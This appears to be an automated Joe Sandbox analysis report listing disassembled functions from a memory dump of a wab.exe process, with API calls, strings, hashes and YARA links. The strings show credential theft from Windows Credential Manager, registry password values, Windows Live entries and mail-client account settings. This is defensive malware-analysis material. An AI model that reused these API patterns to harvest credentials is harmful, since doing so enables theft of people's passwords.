                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$Library$FreeLoad
                                                                                              • String ID: CredDeleteA$CredEnumerateA$CredEnumerateW$CredFree$CredReadA$advapi32.dll
                                                                                              • API String ID: 2449869053-4258758744
                                                                                              • Opcode ID: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                              • Instruction ID: 2cc24b9197253aa622afa6144fd2e07652f81762edb29d5cb7a2b3ace442d85c
                                                                                              • Opcode Fuzzy Hash: 95c828cc82fe4028a070e770a6f28d73b450c6aa5ffca84da52b55bfa0e2fca7
                                                                                              • Instruction Fuzzy Hash: 12014FB49017009ADB30AF75C809B46BBE0EFA9704F214C2FE295A3691E77ED445CF88
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F802 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                                                              • memset.MSVCRT ref: 0040F84A
                                                                                              • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 0040F877
                                                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                                                              • LocalFree.KERNEL32(?), ref: 0040F92C
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F937
                                                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseOpen$ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                                                              • String ID: Creds$ps:password
                                                                                              • API String ID: 551151806-1872227768
                                                                                              • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                              • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                                                              • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                                                              • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404235 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 100stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • wcsstr.MSVCRT ref: 0040426A
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042B1
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 004042C5
                                                                                              • _mbscpy.MSVCRT ref: 004042D5
                                                                                              • _mbscpy.MSVCRT ref: 004042E8
                                                                                              • strchr.MSVCRT ref: 004042F6
                                                                                              • strlen.MSVCRT ref: 0040430A
                                                                                              • sprintf.MSVCRT ref: 0040432B
                                                                                              • strchr.MSVCRT ref: 0040433C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide_mbscpystrchr$sprintfstrlenwcsstr
                                                                                              • String ID: %s@gmail.com$www.google.com
                                                                                              • API String ID: 3866421160-4070641962
                                                                                              • Opcode ID: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                              • Instruction ID: 1d125d0bf78842d5973e64574db62130ec83037e0b154f7c504db0db8660d96c
                                                                                              • Opcode Fuzzy Hash: 29547c4834dfc2f3f2c875d949c5bc687f91e1fab8962d8e257cc58e07cba8ed
                                                                                              • Instruction Fuzzy Hash: DA3186B290025DAFEB11DBA1DC81FDAB3BCEB45714F1405A7B718E3180DA38EF448A58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00409731 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 69COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _mbscpy.MSVCRT ref: 00409749
                                                                                              • _mbscpy.MSVCRT ref: 00409759
                                                                                                • Part of subcall function 0040930C: memset.MSVCRT ref: 00409331
                                                                                                • Part of subcall function 0040930C: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,?,00001000,0045A448), ref: 00409355
                                                                                                • Part of subcall function 0040930C: WritePrivateProfileStringA.KERNEL32(0045A550,?,?,0045A448), ref: 0040936C
                                                                                              • EnumResourceNamesA.KERNEL32(?,00000004,Function_0000955A,00000000), ref: 0040978F
                                                                                              • EnumResourceNamesA.KERNEL32(?,00000005,Function_0000955A,00000000), ref: 00409799
                                                                                              • _mbscpy.MSVCRT ref: 004097A1
                                                                                              • memset.MSVCRT ref: 004097BD
                                                                                              • LoadStringA.USER32(?,00000000,?,00001000), ref: 004097D1
                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: String_mbscpy$EnumNamesPrivateProfileResourcememset$LoadWrite_itoa
                                                                                              • String ID: TranslatorName$TranslatorURL$general$strings
                                                                                              • API String ID: 1035899707-3647959541
                                                                                              • Opcode ID: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                              • Instruction ID: 9d87356d66cebc64c7ffc1a8588b7925a858c7ffbf95e02bf5fcf8d8eff5f455
                                                                                              • Opcode Fuzzy Hash: 07fb82029a378e95c81cd618e89f57cfeb9c17a135c2b190ac6c60c85071189e
                                                                                              • Instruction Fuzzy Hash: F711C87290016475F7312B569C46F9B3F5CDBCAB55F10007BBB08A71C3D6B89D408AAD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E381 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 129COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _strcmpi_strnicmpmemsetsprintf$strlen
                                                                                              • String ID: imap://$imap://%s@%s$mailbox://$mailbox://%s@%s
                                                                                              • API String ID: 2360744853-2229823034
                                                                                              • Opcode ID: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                              • Instruction ID: 1258fd73e7f0479363a75d8e9bd03f7624e4807d7768342ee5bbbb65847b95d7
                                                                                              • Opcode Fuzzy Hash: fa9f5f1c2ef6f652c20f964ce99d96b8fee6feb6c02ab87e42e45cad748783be
                                                                                              • Instruction Fuzzy Hash: 95418272604605AFE720DAA6CC81F96B3F8EB04314F14497BF95AE7281D738F9548B58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004100CC Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 81stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • strchr.MSVCRT ref: 004100E4
                                                                                              • _mbscpy.MSVCRT ref: 004100F2
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                              • _mbscpy.MSVCRT ref: 00410142
                                                                                              • _mbscat.MSVCRT ref: 0041014D
                                                                                              • memset.MSVCRT ref: 00410129
                                                                                                • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                                                                                • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                                                                              • memset.MSVCRT ref: 00410171
                                                                                              • memcpy.MSVCRT ref: 0041018C
                                                                                              • _mbscat.MSVCRT ref: 00410197
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                                                                              • String ID: \systemroot
                                                                                              • API String ID: 912701516-1821301763
                                                                                              • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                              • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                                                                              • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                                                                              • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004196A1 Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 321COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy$strlen
                                                                                              • String ID: -journal$-wal$immutable$nolock
                                                                                              • API String ID: 2619041689-3408036318
                                                                                              • Opcode ID: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                              • Instruction ID: 25f2131b2e7268d2841c48c11c9a86e68458d3caa4be6fdea11427aceae17f40
                                                                                              • Opcode Fuzzy Hash: 4aa253e10d8a34062e03d838a13a14f4a10eae4ea059de94ba2ca72b62420cd1
                                                                                              • Instruction Fuzzy Hash: 9FC1D1B1A04606EFDB14DFA5C841BDEFBB0BF45314F14815EE528A7381D778AA90CB98
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004086E0 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 155COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                                                                                • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                                                                              • wcslen.MSVCRT ref: 0040874A
                                                                                              • _wcsncoll.MSVCRT ref: 00408794
                                                                                              • memset.MSVCRT ref: 0040882A
                                                                                              • memcpy.MSVCRT ref: 00408849
                                                                                              • wcschr.MSVCRT ref: 0040889F
                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 004088CB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                              • String ID: J$Microsoft_WinInet
                                                                                              • API String ID: 2203907242-260894208
                                                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004108E5 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                              • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                                                                              • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                              • memcpy.MSVCRT ref: 00410961
                                                                                              Strings
                                                                                              • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                                                                              • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                                                                              • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                                                                              • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FromStringUuid$memcpy
                                                                                              • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                              • API String ID: 2859077140-2022683286
                                                                                              • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                              • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                                                                              • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                                                                              • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040966C Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              • _mbscpy.MSVCRT ref: 00409686
                                                                                              • _mbscpy.MSVCRT ref: 00409696
                                                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                              • API String ID: 888011440-2039793938
                                                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0042E8E8 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • unable to open database: %s, xrefs: 0042EBD6
                                                                                              • database is already attached, xrefs: 0042EA97
                                                                                              • cannot ATTACH database within transaction, xrefs: 0042E966
                                                                                              • out of memory, xrefs: 0042EBEF
                                                                                              • database %s is already in use, xrefs: 0042E9CE
                                                                                              • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                                                              • too many attached databases - max %d, xrefs: 0042E951
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpymemset
                                                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                              • API String ID: 1297977491-2001300268
                                                                                              • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                              • strchr.MSVCRT ref: 0040327B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringstrchr
                                                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                              • API String ID: 1348940319-1729847305
                                                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memcpy
                                                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                              • API String ID: 3510742995-3273207271
                                                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              • memset.MSVCRT ref: 0040FA1E
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                                                              • API String ID: 945165440-3589380929
                                                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                • Part of subcall function 00410863: memcpy.MSVCRT ref: 004108C3
                                                                                              • strchr.MSVCRT ref: 0040371F
                                                                                              • _mbscpy.MSVCRT ref: 00403748
                                                                                              • _mbscpy.MSVCRT ref: 00403758
                                                                                              • strlen.MSVCRT ref: 00403778
                                                                                              • sprintf.MSVCRT ref: 0040379C
                                                                                              • _mbscpy.MSVCRT ref: 004037B2
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _mbscpy$FromStringUuid$memcpysprintfstrchrstrlen
                                                                                              • String ID: %s@gmail.com
                                                                                              • API String ID: 500647785-4097000612
                                                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004094C8
                                                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                              • memset.MSVCRT ref: 0040950C
                                                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                              • String ID: sysdatetimepick32
                                                                                              • API String ID: 3411445237-4169760276
                                                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                              • String ID:
                                                                                              • API String ID: 3642520215-0
                                                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
